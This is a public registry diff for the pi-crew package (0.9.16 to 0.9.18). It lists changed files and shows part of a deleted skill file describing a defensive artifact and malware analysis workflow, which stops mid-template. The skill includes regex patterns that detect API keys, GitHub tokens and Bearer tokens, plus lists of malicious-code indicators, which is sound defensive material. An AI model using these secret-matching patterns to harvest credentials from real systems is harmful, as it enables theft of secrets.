pi-crew 0.9.16 → 0.9.18

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (435) hide show
  1. package/CHANGELOG.md +130 -0
  2. package/README.md +19 -0
  3. package/dist/build-meta.json +21784 -0
  4. package/dist/index.mjs +83169 -0
  5. package/dist/index.mjs.map +7 -0
  6. package/docs/A +358 -0
  7. package/docs/M-A +357 -0
  8. package/docs/REVIEW-FINDINGS-2026-06 +357 -0
  9. package/docs/Y +357 -0
  10. package/docs/a +357 -0
  11. package/docs/aA +358 -0
  12. package/docs/archive/README.md +91 -0
  13. package/docs/migration/atomic-write-v2-migration.md +297 -0
  14. package/docs/patterns/command-agent-skill.md +1 -1
  15. package/docs/perf/performance-review-2026-07.md +287 -0
  16. package/docs/skills/REFERENCE.md +0 -17
  17. package/docs//303/242mmaAAA/303/242 +357 -0
  18. package/index.bundle.ts +25 -0
  19. package/index.ts +95 -4
  20. package/package.json +15 -4
  21. package/skills/iterative-audit/SKILL.md +0 -1
  22. package/skills/widget-rendering/SKILL.md +17 -0
  23. package/src/adapters/claude-adapter.ts +1 -3
  24. package/src/adapters/export-util.ts +16 -16
  25. package/src/adapters/index.ts +5 -5
  26. package/src/agents/agent-config.ts +20 -14
  27. package/src/agents/agent-serializer.ts +1 -1
  28. package/src/agents/discover-agents.ts +83 -39
  29. package/src/benchmark/benchmark-runner.ts +51 -51
  30. package/src/benchmark/feedback-loop.ts +1 -1
  31. package/src/config/config.ts +303 -591
  32. package/src/config/defaults.ts +28 -2
  33. package/src/config/drift-detector.ts +11 -14
  34. package/src/config/markers.ts +201 -203
  35. package/src/config/resilient-parser.ts +14 -6
  36. package/src/config/role-tools.ts +3 -3
  37. package/src/config/suggestions.ts +5 -12
  38. package/src/config/types.ts +9 -25
  39. package/src/errors.ts +151 -157
  40. package/src/extension/action-suggestions.ts +54 -9
  41. package/src/extension/async-notifier.ts +43 -13
  42. package/src/extension/autonomous-policy.ts +77 -37
  43. package/src/extension/command-completions.ts +9 -8
  44. package/src/extension/context-status-injection.ts +14 -12
  45. package/src/extension/crew-autocomplete.ts +8 -16
  46. package/src/extension/crew-cleanup.ts +2 -1
  47. package/src/extension/crew-shortcuts.ts +9 -6
  48. package/src/extension/cross-extension-rpc.ts +136 -42
  49. package/src/extension/help.ts +1 -1
  50. package/src/extension/import-index.ts +10 -5
  51. package/src/extension/knowledge-injection.ts +88 -15
  52. package/src/extension/management.ts +89 -349
  53. package/src/extension/message-renderers.ts +3 -4
  54. package/src/extension/notification-router.ts +22 -5
  55. package/src/extension/notification-sink.ts +6 -3
  56. package/src/extension/pi-api.ts +17 -8
  57. package/src/extension/plan-orchestrate.ts +8 -27
  58. package/src/extension/project-init.ts +21 -6
  59. package/src/extension/register.ts +329 -975
  60. package/src/extension/registration/artifact-cleanup.ts +9 -4
  61. package/src/extension/registration/command-utils.ts +5 -1
  62. package/src/extension/registration/commands.ts +806 -314
  63. package/src/extension/registration/compaction-guard.ts +15 -15
  64. package/src/extension/registration/lifecycle.ts +259 -0
  65. package/src/extension/registration/observability.ts +293 -0
  66. package/src/extension/registration/subagent-helpers.ts +29 -7
  67. package/src/extension/registration/subagent-tools.ts +253 -44
  68. package/src/extension/registration/team-tool.ts +19 -84
  69. package/src/extension/registration/ui.ts +168 -0
  70. package/src/extension/registration/viewers.ts +64 -24
  71. package/src/extension/result-watcher.ts +18 -7
  72. package/src/extension/run-bundle-schema.ts +21 -6
  73. package/src/extension/run-export.ts +15 -6
  74. package/src/extension/run-import.ts +64 -29
  75. package/src/extension/run-index.ts +28 -9
  76. package/src/extension/run-maintenance.ts +32 -12
  77. package/src/extension/session-summary.ts +1 -1
  78. package/src/extension/team-manager-command.ts +64 -7
  79. package/src/extension/team-onboard.ts +149 -150
  80. package/src/extension/team-recommendation.ts +121 -21
  81. package/src/extension/team-tool/anchor.ts +31 -64
  82. package/src/extension/team-tool/api.ts +929 -141
  83. package/src/extension/team-tool/auto-summarize.ts +14 -26
  84. package/src/extension/team-tool/cache-control.ts +1 -5
  85. package/src/extension/team-tool/cancel.ts +138 -38
  86. package/src/extension/team-tool/chain-dispatch.ts +5 -13
  87. package/src/extension/team-tool/chain-executor.ts +29 -51
  88. package/src/extension/team-tool/config-patch.ts +1 -1
  89. package/src/extension/team-tool/context.ts +40 -20
  90. package/src/extension/team-tool/destructive-gate.ts +10 -5
  91. package/src/extension/team-tool/doctor.ts +170 -51
  92. package/src/extension/team-tool/explain.ts +228 -214
  93. package/src/extension/team-tool/failure-patterns.ts +3 -9
  94. package/src/extension/team-tool/goal-wrap.ts +71 -29
  95. package/src/extension/team-tool/goal.ts +185 -35
  96. package/src/extension/team-tool/handle-schedule.ts +34 -15
  97. package/src/extension/team-tool/handle-settings.ts +94 -56
  98. package/src/extension/team-tool/health-monitor.ts +27 -108
  99. package/src/extension/team-tool/inspect.ts +42 -9
  100. package/src/extension/team-tool/intent-policy.ts +4 -1
  101. package/src/extension/team-tool/lifecycle-actions.ts +244 -48
  102. package/src/extension/team-tool/orchestrate.ts +7 -18
  103. package/src/extension/team-tool/parallel-dispatch.ts +51 -29
  104. package/src/extension/team-tool/plan.ts +29 -5
  105. package/src/extension/team-tool/respond.ts +49 -16
  106. package/src/extension/team-tool/run-not-found.ts +3 -8
  107. package/src/extension/team-tool/run.ts +80 -317
  108. package/src/extension/team-tool/status.ts +135 -43
  109. package/src/extension/team-tool/workflow-manage.ts +92 -25
  110. package/src/extension/team-tool-types.ts +8 -1
  111. package/src/extension/team-tool.ts +142 -551
  112. package/src/extension/validate-resources.ts +39 -8
  113. package/src/hooks/registry.ts +66 -17
  114. package/src/hooks/types.ts +1 -1
  115. package/src/i18n.ts +25 -11
  116. package/src/observability/correlation.ts +17 -3
  117. package/src/observability/event-bus.ts +51 -56
  118. package/src/observability/event-to-metric.ts +117 -15
  119. package/src/observability/exporters/otlp-exporter.ts +56 -17
  120. package/src/observability/exporters/prometheus-exporter.ts +1 -1
  121. package/src/observability/metric-registry.ts +16 -4
  122. package/src/observability/metric-retention.ts +8 -2
  123. package/src/observability/metric-sink.ts +11 -3
  124. package/src/observability/metrics-primitives.ts +42 -9
  125. package/src/plugins/plugin-define.ts +2 -2
  126. package/src/plugins/plugin-registry.ts +25 -25
  127. package/src/plugins/plugins/index.ts +1 -1
  128. package/src/plugins/plugins/nextjs.ts +16 -16
  129. package/src/plugins/plugins/vite.ts +7 -11
  130. package/src/plugins/plugins/vitest.ts +6 -11
  131. package/src/runtime/adaptive-plan.ts +225 -40
  132. package/src/runtime/agent-control.ts +58 -15
  133. package/src/runtime/agent-memory.ts +15 -9
  134. package/src/runtime/agent-observability.ts +10 -2
  135. package/src/runtime/anchor-manager.ts +27 -25
  136. package/src/runtime/async-marker.ts +7 -1
  137. package/src/runtime/async-runner.ts +39 -24
  138. package/src/runtime/auto-summarize.ts +7 -13
  139. package/src/runtime/background-runner.ts +189 -251
  140. package/src/runtime/batch-barrier.ts +18 -16
  141. package/src/runtime/cancellation-token.ts +16 -6
  142. package/src/runtime/cancellation.ts +46 -8
  143. package/src/runtime/capability-inventory.ts +6 -4
  144. package/src/runtime/chain-parser.ts +44 -11
  145. package/src/runtime/chain-runner.ts +63 -69
  146. package/src/runtime/checkpoint.ts +12 -56
  147. package/src/runtime/child-pi.ts +344 -79
  148. package/src/runtime/coalesce-tasks.ts +268 -0
  149. package/src/runtime/code-summary.ts +71 -26
  150. package/src/runtime/compact-stages/index.ts +15 -5
  151. package/src/runtime/compact-stages/tail-capture-stage.ts +7 -2
  152. package/src/runtime/compact-stages/truncation-stage.ts +4 -1
  153. package/src/runtime/compaction-summary.ts +17 -10
  154. package/src/runtime/completion-guard.ts +33 -16
  155. package/src/runtime/crash-classification.ts +28 -7
  156. package/src/runtime/crash-recovery.ts +177 -37
  157. package/src/runtime/crew-agent-records.ts +145 -47
  158. package/src/runtime/crew-hooks.ts +9 -24
  159. package/src/runtime/cross-extension-rpc.ts +25 -23
  160. package/src/runtime/custom-tools/irc-tool.ts +43 -15
  161. package/src/runtime/custom-tools/submit-result-tool.ts +16 -5
  162. package/src/runtime/delivery-coordinator.ts +34 -7
  163. package/src/runtime/delta-conflict.ts +9 -21
  164. package/src/runtime/deterministic-ast.ts +1 -1
  165. package/src/runtime/diagnostic-export.ts +53 -20
  166. package/src/runtime/direct-run.ts +12 -2
  167. package/src/runtime/dwf-state-store.ts +1 -1
  168. package/src/runtime/dynamic-workflow-context.ts +187 -59
  169. package/src/runtime/dynamic-workflow-runner.ts +42 -20
  170. package/src/runtime/effectiveness.ts +16 -8
  171. package/src/runtime/errors/crew-errors.ts +7 -11
  172. package/src/runtime/event-stream-bridge.ts +9 -3
  173. package/src/runtime/foreground-control.ts +54 -14
  174. package/src/runtime/foreground-watchdog.ts +9 -6
  175. package/src/runtime/goal-achievement.ts +27 -10
  176. package/src/runtime/goal-evaluator.ts +54 -19
  177. package/src/runtime/goal-loop-runner.ts +280 -99
  178. package/src/runtime/goal-state-store.ts +27 -17
  179. package/src/runtime/green-contract.ts +11 -2
  180. package/src/runtime/group-join.ts +64 -31
  181. package/src/runtime/handoff-manager.ts +37 -42
  182. package/src/runtime/heartbeat-gradient.ts +10 -2
  183. package/src/runtime/heartbeat-watcher.ts +32 -6
  184. package/src/runtime/hidden-handoff.ts +13 -31
  185. package/src/runtime/important-line-classifier.ts +12 -2
  186. package/src/runtime/iteration-hooks.ts +25 -15
  187. package/src/runtime/live-agent-control.ts +55 -7
  188. package/src/runtime/live-agent-manager.ts +130 -27
  189. package/src/runtime/live-control-realtime.ts +23 -3
  190. package/src/runtime/live-irc.ts +4 -1
  191. package/src/runtime/live-session-health.ts +12 -4
  192. package/src/runtime/live-session-runtime.ts +379 -117
  193. package/src/runtime/manifest-cache.ts +28 -12
  194. package/src/runtime/mcp-proxy.ts +10 -18
  195. package/src/runtime/metric-parser.ts +1 -5
  196. package/src/runtime/model-fallback.ts +55 -18
  197. package/src/runtime/model-resolver.ts +2 -6
  198. package/src/runtime/model-scope.ts +19 -3
  199. package/src/runtime/notebook-helpers.ts +60 -62
  200. package/src/runtime/orphan-worker-registry.ts +37 -26
  201. package/src/runtime/output-validator.ts +18 -3
  202. package/src/runtime/overflow-recovery.ts +5 -4
  203. package/src/runtime/parallel-research.ts +29 -5
  204. package/src/runtime/parallel-utils.ts +9 -11
  205. package/src/runtime/path-overlap.ts +150 -0
  206. package/src/runtime/peer-dep.ts +12 -17
  207. package/src/runtime/per-write-validator.ts +1 -3
  208. package/src/runtime/phase-tracker.ts +342 -330
  209. package/src/runtime/pi-args.ts +26 -8
  210. package/src/runtime/pi-json-output.ts +1 -1
  211. package/src/runtime/pi-spawn.ts +30 -19
  212. package/src/runtime/pipeline-runner.ts +56 -55
  213. package/src/runtime/plan-templates.ts +5 -6
  214. package/src/runtime/policy-engine.ts +43 -7
  215. package/src/runtime/post-checks.ts +12 -4
  216. package/src/runtime/post-exit-stdio-guard.ts +2 -2
  217. package/src/runtime/process-lifecycle.ts +20 -10
  218. package/src/runtime/process-status.ts +16 -5
  219. package/src/runtime/progress-event-coalescer.ts +2 -1
  220. package/src/runtime/progress-tracker.ts +103 -103
  221. package/src/runtime/prose-compressor.ts +9 -11
  222. package/src/runtime/recovery-recipes.ts +118 -24
  223. package/src/runtime/replace.ts +25 -10
  224. package/src/runtime/resilient-edit.ts +10 -25
  225. package/src/runtime/result-extractor.ts +2 -6
  226. package/src/runtime/retry-executor.ts +20 -4
  227. package/src/runtime/retry-runner.ts +27 -51
  228. package/src/runtime/role-permission.ts +6 -1
  229. package/src/runtime/run-coalesced-task-group.ts +256 -0
  230. package/src/runtime/run-drift.ts +14 -15
  231. package/src/runtime/run-tracker.ts +6 -28
  232. package/src/runtime/runtime-policy.ts +1 -6
  233. package/src/runtime/runtime-resolver.ts +80 -15
  234. package/src/runtime/scheduler.ts +47 -18
  235. package/src/runtime/semaphore.ts +5 -7
  236. package/src/runtime/sensitive-paths.ts +2 -1
  237. package/src/runtime/session-usage.ts +1 -1
  238. package/src/runtime/settings-store.ts +16 -12
  239. package/src/runtime/sidechain-output.ts +6 -2
  240. package/src/runtime/single-agent-compose.ts +1 -4
  241. package/src/runtime/skill-effectiveness.ts +29 -97
  242. package/src/runtime/skill-instructions.ts +40 -83
  243. package/src/runtime/stale-reconciler.ts +73 -197
  244. package/src/runtime/stream-preview.ts +1 -1
  245. package/src/runtime/streaming-output.ts +1 -1
  246. package/src/runtime/subagent-manager.ts +44 -169
  247. package/src/runtime/subprocess-tool-registry.ts +4 -1
  248. package/src/runtime/supervisor-contact.ts +10 -5
  249. package/src/runtime/task-display.ts +19 -5
  250. package/src/runtime/task-graph-scheduler.ts +95 -21
  251. package/src/runtime/task-graph.ts +5 -11
  252. package/src/runtime/task-health.ts +54 -47
  253. package/src/runtime/task-id.ts +12 -19
  254. package/src/runtime/task-output-context.ts +265 -81
  255. package/src/runtime/task-packet.ts +12 -20
  256. package/src/runtime/task-quality.ts +6 -14
  257. package/src/runtime/task-runner/context-retrieval.ts +4 -13
  258. package/src/runtime/task-runner/live-executor.ts +114 -36
  259. package/src/runtime/task-runner/output-splitter.ts +152 -0
  260. package/src/runtime/task-runner/progress.ts +50 -12
  261. package/src/runtime/task-runner/prompt-builder.ts +31 -7
  262. package/src/runtime/task-runner/prompt-pipeline.ts +31 -7
  263. package/src/runtime/task-runner/result-utils.ts +3 -1
  264. package/src/runtime/task-runner/retrieval-orchestrator.ts +310 -0
  265. package/src/runtime/task-runner/run-projection.ts +27 -8
  266. package/src/runtime/task-runner/state-helpers.ts +50 -14
  267. package/src/runtime/task-runner/tail-read.ts +2 -6
  268. package/src/runtime/task-runner.ts +180 -326
  269. package/src/runtime/team-runner-artifacts.ts +13 -0
  270. package/src/runtime/team-runner.ts +456 -974
  271. package/src/runtime/tool-output-pruner.ts +6 -9
  272. package/src/runtime/tool-progress.ts +11 -21
  273. package/src/runtime/verification-gates.ts +33 -24
  274. package/src/runtime/verification-integrity.ts +2 -7
  275. package/src/runtime/verification-worktree.ts +62 -12
  276. package/src/runtime/worker-heartbeat.ts +5 -1
  277. package/src/runtime/worker-startup.ts +29 -5
  278. package/src/runtime/workflow-state.ts +17 -9
  279. package/src/runtime/workspace-lock.ts +30 -35
  280. package/src/runtime/workspace-tree.ts +20 -32
  281. package/src/runtime/yield-handler.ts +43 -9
  282. package/src/runtime/zombie-scanner.ts +5 -4
  283. package/src/schema/config-schema.ts +266 -172
  284. package/src/schema/team-tool-schema.ts +29 -74
  285. package/src/schema/validation-types.ts +25 -17
  286. package/src/skills/discover-skills.ts +35 -10
  287. package/src/skills/skill-templates.ts +109 -27
  288. package/src/skills/validate.ts +26 -8
  289. package/src/state/active-run-registry.ts +87 -28
  290. package/src/state/artifact-store.ts +9 -5
  291. package/src/state/atomic-write-v2.ts +85 -63
  292. package/src/state/atomic-write.ts +106 -27
  293. package/src/state/blob-store.ts +47 -20
  294. package/src/state/contracts.ts +20 -5
  295. package/src/state/crew-init.ts +5 -22
  296. package/src/state/decision-ledger.ts +19 -73
  297. package/src/state/event-log-rotation.ts +41 -15
  298. package/src/state/event-log.ts +168 -53
  299. package/src/state/event-reconstructor.ts +11 -1
  300. package/src/state/gitignore-manager.ts +2 -8
  301. package/src/state/health-store.ts +57 -57
  302. package/src/state/hook-instinct-bridge.ts +1 -1
  303. package/src/state/hook-integrations.ts +1 -1
  304. package/src/state/instinct-store.ts +17 -5
  305. package/src/state/jsonl-writer.ts +1 -1
  306. package/src/state/locks.ts +23 -9
  307. package/src/state/mailbox.ts +151 -28
  308. package/src/state/observation-store.ts +20 -14
  309. package/src/state/run-cache.ts +142 -135
  310. package/src/state/run-graph.ts +6 -15
  311. package/src/state/run-metrics.ts +5 -18
  312. package/src/state/schedule.ts +15 -9
  313. package/src/state/state-store.ts +137 -47
  314. package/src/state/task-claims.ts +12 -2
  315. package/src/state/tiered-eval.ts +52 -43
  316. package/src/state/types-eval.ts +2 -2
  317. package/src/state/types.ts +24 -20
  318. package/src/state/usage.ts +20 -4
  319. package/src/state/worker-atomic-writer.ts +6 -3
  320. package/src/subagents/index.ts +2 -2
  321. package/src/teams/discover-teams.ts +21 -6
  322. package/src/tools/safe-bash-extension.ts +5 -6
  323. package/src/tools/safe-bash.ts +10 -11
  324. package/src/types/new-api-types.ts +6 -10
  325. package/src/ui/agent-management-overlay.ts +52 -40
  326. package/src/ui/card-colors.ts +13 -4
  327. package/src/ui/crew-footer.ts +8 -7
  328. package/src/ui/crew-select-list.ts +1 -1
  329. package/src/ui/dashboard-panes/agents-pane.ts +41 -25
  330. package/src/ui/dashboard-panes/cancellation-pane.ts +1 -1
  331. package/src/ui/dashboard-panes/capability-pane.ts +32 -15
  332. package/src/ui/dashboard-panes/health-pane.ts +2 -1
  333. package/src/ui/dashboard-panes/metrics-pane.ts +4 -1
  334. package/src/ui/dashboard-panes/progress-pane.ts +12 -9
  335. package/src/ui/heartbeat-aggregator.ts +15 -4
  336. package/src/ui/keybinding-map.ts +40 -7
  337. package/src/ui/live-conversation-overlay.ts +36 -20
  338. package/src/ui/live-duration.ts +1 -4
  339. package/src/ui/live-run-sidebar.ts +88 -25
  340. package/src/ui/loaders.ts +2 -8
  341. package/src/ui/mascot.ts +20 -36
  342. package/src/ui/overlays/agent-picker-overlay.ts +11 -3
  343. package/src/ui/overlays/confirm-overlay.ts +4 -2
  344. package/src/ui/overlays/help-overlay.ts +25 -14
  345. package/src/ui/overlays/mailbox-compose-overlay.ts +48 -11
  346. package/src/ui/overlays/mailbox-compose-preview.ts +20 -5
  347. package/src/ui/overlays/mailbox-detail-overlay.ts +27 -6
  348. package/src/ui/pi-ui-compat.ts +7 -7
  349. package/src/ui/powerbar-publisher.ts +120 -42
  350. package/src/ui/render-diff.ts +10 -3
  351. package/src/ui/render-scheduler.ts +12 -4
  352. package/src/ui/run-action-dispatcher.ts +81 -18
  353. package/src/ui/run-dashboard.ts +172 -76
  354. package/src/ui/run-event-bus.ts +59 -37
  355. package/src/ui/run-snapshot-cache.ts +276 -86
  356. package/src/ui/settings-overlay.ts +361 -74
  357. package/src/ui/status-colors.ts +12 -1
  358. package/src/ui/syntax-highlight.ts +1 -1
  359. package/src/ui/terminal-status.ts +1 -3
  360. package/src/ui/theme-adapter.ts +16 -14
  361. package/src/ui/theme-discovery.ts +13 -2
  362. package/src/ui/tool-progress-formatter.ts +7 -7
  363. package/src/ui/tool-render.ts +128 -56
  364. package/src/ui/tool-renderers/brief-mode.ts +45 -27
  365. package/src/ui/tool-renderers/index.ts +109 -43
  366. package/src/ui/transcript-cache.ts +32 -6
  367. package/src/ui/transcript-entries.ts +25 -23
  368. package/src/ui/transcript-viewer.ts +78 -29
  369. package/src/ui/widget/index.ts +99 -40
  370. package/src/ui/widget/widget-formatters.ts +13 -6
  371. package/src/ui/widget/widget-model.ts +19 -8
  372. package/src/ui/widget/widget-renderer.ts +23 -13
  373. package/src/ui/widget/widget-types.ts +1 -1
  374. package/src/utils/bm25-search.ts +199 -199
  375. package/src/utils/conflict-detect.ts +22 -21
  376. package/src/utils/env-filter.ts +14 -7
  377. package/src/utils/file-coalescer.ts +5 -1
  378. package/src/utils/fingerprint.ts +3 -6
  379. package/src/utils/frontmatter.ts +3 -1
  380. package/src/utils/fs-watch.ts +2 -6
  381. package/src/utils/gh-protocol.ts +119 -44
  382. package/src/utils/git.ts +13 -15
  383. package/src/utils/guards.ts +2 -5
  384. package/src/utils/ids.ts +9 -2
  385. package/src/utils/incremental-reader.ts +14 -3
  386. package/src/utils/internal-error.ts +2 -1
  387. package/src/utils/names.ts +12 -3
  388. package/src/utils/paths.ts +49 -5
  389. package/src/utils/project-detector.ts +2 -2
  390. package/src/utils/redaction.ts +29 -19
  391. package/src/utils/resolve-shell.ts +9 -7
  392. package/src/utils/run-watcher-registry.ts +19 -31
  393. package/src/utils/safe-paths.ts +46 -29
  394. package/src/utils/scan-cache.ts +9 -2
  395. package/src/utils/session-utils.ts +2 -4
  396. package/src/utils/sleep.ts +12 -5
  397. package/src/utils/sse-parser.ts +5 -17
  398. package/src/utils/visual.ts +52 -32
  399. package/src/workflows/discover-workflows.ts +41 -109
  400. package/src/workflows/intermediate-store.ts +5 -21
  401. package/src/workflows/preflight-validator.ts +6 -33
  402. package/src/workflows/topology-analyzer.ts +5 -21
  403. package/src/workflows/workflow-config.ts +7 -6
  404. package/src/worktree/branch-freshness.ts +66 -8
  405. package/src/worktree/cleanup.ts +130 -20
  406. package/src/worktree/worktree-manager.ts +212 -69
  407. package/skills/artifact-analysis-loop/SKILL.md +0 -303
  408. package/skills/detection-pipeline-design/SKILL.md +0 -286
  409. package/skills/hunting-investigation-loop/SKILL.md +0 -402
  410. package/skills/incident-playbook-construction/SKILL.md +0 -384
  411. package/skills/security-review/SKILL.md +0 -561
  412. package/skills/threat-hypothesis-framework/SKILL.md +0 -176
  413. package/skills/ui-render-performance/SKILL.md +0 -58
  414. /package/docs/{followup-review-round3-2026-05-12.md → archive/followup-review-round3-2026-05-12.md} +0 -0
  415. /package/docs/{followup-review-round4-2026-05-13.md → archive/followup-review-round4-2026-05-13.md} +0 -0
  416. /package/docs/{pi-crew-bugs.md → archive/pi-crew-bugs.md} +0 -0
  417. /package/docs/{pi-crew-test-final.md → archive/pi-crew-test-final.md} +0 -0
  418. /package/docs/{pi-crew-test-results.md → archive/pi-crew-test-results.md} +0 -0
  419. /package/docs/{pi-crew-test-round2.md → archive/pi-crew-test-round2.md} +0 -0
  420. /package/docs/{pi-crew-test-round4.md → archive/pi-crew-test-round4.md} +0 -0
  421. /package/docs/{pi-crew-test-round5.md → archive/pi-crew-test-round5.md} +0 -0
  422. /package/docs/{pi-crew-test-round6.md → archive/pi-crew-test-round6.md} +0 -0
  423. /package/docs/{pi-crew-v0.5.10-audit-fix-plan.md → archive/pi-crew-v0.5.10-audit-fix-plan.md} +0 -0
  424. /package/docs/{pi-crew-v0.5.11-audit-fix-plan.md → archive/pi-crew-v0.5.11-audit-fix-plan.md} +0 -0
  425. /package/docs/{pi-crew-v0.5.12-audit-fix-plan.md → archive/pi-crew-v0.5.12-audit-fix-plan.md} +0 -0
  426. /package/docs/{pi-crew-v0.5.13-audit-fix-plan.md → archive/pi-crew-v0.5.13-audit-fix-plan.md} +0 -0
  427. /package/docs/{pi-crew-v0.5.14-audit-fix-plan.md → archive/pi-crew-v0.5.14-audit-fix-plan.md} +0 -0
  428. /package/docs/{pi-crew-v0.5.16-audit-fix-plan.md → archive/pi-crew-v0.5.16-audit-fix-plan.md} +0 -0
  429. /package/docs/{pi-crew-v0.5.17-audit-fix-plan.md → archive/pi-crew-v0.5.17-audit-fix-plan.md} +0 -0
  430. /package/docs/{pi-crew-v0.5.5-audit-fix-plan.md → archive/pi-crew-v0.5.5-audit-fix-plan.md} +0 -0
  431. /package/docs/{pi-crew-v0.5.9-audit-fix-plan.md → archive/pi-crew-v0.5.9-audit-fix-plan.md} +0 -0
  432. /package/docs/{pi-mono-opportunities.md → archive/pi-mono-opportunities.md} +0 -0
  433. /package/docs/{pi-mono-review.md → archive/pi-mono-review.md} +0 -0
  434. /package/docs/{pi-subagent4-comparison.md → archive/pi-subagent4-comparison.md} +0 -0
  435. /package/docs/{pi-subagents3-deep-analysis.md → archive/pi-subagents3-deep-analysis.md} +0 -0
@@ -1,303 +0,0 @@
1
- ---
2
- name: artifact-analysis-loop
3
- description: "Systematic artifact examination for code, files, and binaries."
4
- origin: distilled:anthropic-cybersecurity-skills
5
- triggers:
6
- - "analyze this artifact"
7
- - "examine file"
8
- - "dissect sample"
9
- - "malware analysis"
10
- - "forensic investigation"
11
- ---
12
- # artifact-analysis-loop
13
-
14
- Use this skill when conducting systematic artifact analysis (files, code, binaries, configs).
15
-
16
- ## Source
17
-
18
- Distilled from 35+ `analyzing-*` skills (Anthropic Cybersecurity Skills) and generalized for software artifacts.
19
-
20
- ## When to Use
21
-
22
- - Analyzing suspicious files or code
23
- - Malware/sample examination
24
- - Post-incident artifact forensics
25
- - Vulnerability analysis in specific files
26
- - Reverse engineering code patterns
27
-
28
- ## Artifact Analysis Loop
29
-
30
- ```
31
- ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
32
- │ Collect │ → │ Identify │ → │ Analyze │ → │ Extract │ → │ Map │
33
- │ Artifact │ │ Type │ │ Structure│ │ Findings │ │ to Frame-│
34
- │ │ │ │ │ │ │ │ │ work │
35
- └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘
36
-
37
- ┌──────────┐
38
- │ Report │
39
- │Findings │
40
- └──────────┘
41
- ```
42
-
43
- ## Analysis Workflow
44
-
45
- ```markdown
46
- ## Artifact Analysis Loop
47
-
48
- 1. **Collect** → Artifact: [file, code snippet, binary, config, log]
49
- 2. **Identify** → Type: [source code, binary, config, log, data]
50
- 3. **Analyze** → Structure: [static, dynamic, pattern match]
51
- 4. **Extract** → Findings: [patterns, indicators, relationships]
52
- 5. **Map** → To framework: [OWASP, CVE, MITRE, CWE]
53
- 6. **Correlate** → With context: [git history, PR, incident]
54
- 7. **Report** → Structured findings with confidence
55
- ```
56
-
57
- ## Artifact Types & Analysis Methods
58
-
59
- ### 1. Source Code Analysis
60
-
61
- ```yaml
62
- artifact_type: source_code
63
- analysis_methods:
64
- static:
65
- - pattern_matching: [regex, AST]
66
- - control_flow: [function_graph, call_graph]
67
- - data_flow: [variable_taints, function_args]
68
- - import_analysis: [dependencies, external_calls]
69
- dynamic:
70
- - execution: [sandbox, test_env]
71
- - behavior: [network, filesystem, process]
72
- signs_of_malice:
73
- - eval_exec_abuse: [eval(), exec(), Function(), new Function()]
74
- - obfuscation: [encoded_strings, dead_code, indirect_calls]
75
- - credential_access: [env_vars, config_files, hardcoded_secrets]
76
- - network_suspicious: [hardcoded_ips, dns_tunneling, c2_patterns]
77
- ```
78
-
79
- ### 2. Binary Analysis
80
-
81
- ```yaml
82
- artifact_type: binary
83
- analysis_methods:
84
- static:
85
- - file_metadata: [size, entropy, sections]
86
- - string_extraction: [strings, IOCs]
87
- - header_analysis: [pe_format, elf_format]
88
- - symbol_analysis: [exported_funcs, imports]
89
- dynamic:
90
- - sandbox_execution: [cuckoo, any.run]
91
- - memory_analysis: [volatility, rekall]
92
- - network_capture: [wireshark, mitmproxy]
93
- signs_of_malice:
94
- - persistence: [registry, startup, service]
95
- - injection: [dll_injection, process_hollowing]
96
- - network: [suspicious_connections, dns_tunnel]
97
- ```
98
-
99
- ### 3. Configuration Analysis
100
-
101
- ```yaml
102
- artifact_type: config
103
- analysis_methods:
104
- - syntax_validation: [json, yaml, toml]
105
- - permission_analysis: [file_perms, ownership]
106
- - secret_detection: [api_keys, tokens, passwords]
107
- - network_config: [endpoints, ports, protocols]
108
- - security_options: [tls, auth, encryption]
109
- signs_of_malice:
110
- - misconfiguration: [overly_permissive, default_creds]
111
- - secrets: [hardcoded_keys, plaintext_passwords]
112
- - network: [unencrypted, suspicious_endpoints]
113
- ```
114
-
115
- ### 4. Log Analysis
116
-
117
- ```yaml
118
- artifact_type: log
119
- analysis_methods:
120
- - timeline_reconstruction: [timestamp_analysis, event_order]
121
- - pattern_detection: [anomaly, repeated_failure]
122
- - correlation: [cross_source, session_analysis]
123
- - ioc_extraction: [ips, domains, hashes, users]
124
- - attack_indicators: [kill_chain_phases, techniques]
125
- signs_of_malice:
126
- - auth_failures: [brute_force, credential_stuffing]
127
- - suspicious_actions: [privilege_escalation, lateral_movement]
128
- - data_access: [bulk_download, unusual_access]
129
- ```
130
-
131
- ## IOC Extraction Patterns
132
-
133
- ```yaml
134
- ioc_types:
135
- credentials:
136
- patterns:
137
- - '(api[_-]?key|secret|token|password)\s*[=:]\s*["\']?[A-Za-z0-9+/]{20,}'
138
- - '(ghp|github)_[A-Za-z0-9]{36,}'
139
- - 'Bearer\s+[A-Za-z0-9+/=._-]+'
140
- extraction: regex
141
- network:
142
- patterns:
143
- - '\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
144
- - '\b(?:[a-f0-9]{1,4}:){7}[a-f0-9]{1,4}\b' # IPv6
145
- - '(?:https?|tcp|udp)://[^\s]+'
146
- validation: whois, reverse_dns
147
- file_hashes:
148
- patterns:
149
- - '\b[A-Fa-f0-9]{32}\b' # MD5
150
- - '\b[A-Fa-f0-9]{40}\b' # SHA1
151
- - '\b[A-Fa-f0-9]{64}\b' # SHA256
152
- validation: virus_total, malware_db
153
- ```
154
-
155
- ## Framework Mapping
156
-
157
- ```yaml
158
- frameworks:
159
- MITRE_ATTACK:
160
- technique_extraction:
161
- - tactic: [initial_access, execution, persistence]
162
- - technique: [T1190, T1059, T1547]
163
- - indicators: [specific patterns that map]
164
- OWASP:
165
- category_extraction:
166
- - category: [A1, A2, A3, ...]
167
- - weakness: [injection, auth_failure, sensitive_data]
168
- - indicators: [code patterns that map]
169
- CWE:
170
- weakness_extraction:
171
- - cwe_id: [CWE-78, CWE-79, CWE-89]
172
- - description: [command_injection, xss, sql_injection]
173
- - indicators: [code patterns that map]
174
- ```
175
-
176
- ## Artifact Analysis Report
177
-
178
- ```
179
- Artifact Analysis Report
180
- ========================
181
-
182
- Artifact: [filename, path, hash]
183
- Type: [source_code|binary|config|log]
184
- Analysis Date: [timestamp]
185
- Confidence: [High|Medium|Low]
186
-
187
- ## Findings
188
-
189
- ### 1. [Finding Name]
190
- Severity: [Critical|High|Medium|Low]
191
- Location: [file:line or offset]
192
- Evidence: [exact match, hex dump, string]
193
- Framework: [ATT&CK T1059, OWASP A1, CWE-78]
194
- Recommendation: [how to fix/mitigate]
195
-
196
- ### 2. [Finding Name]
197
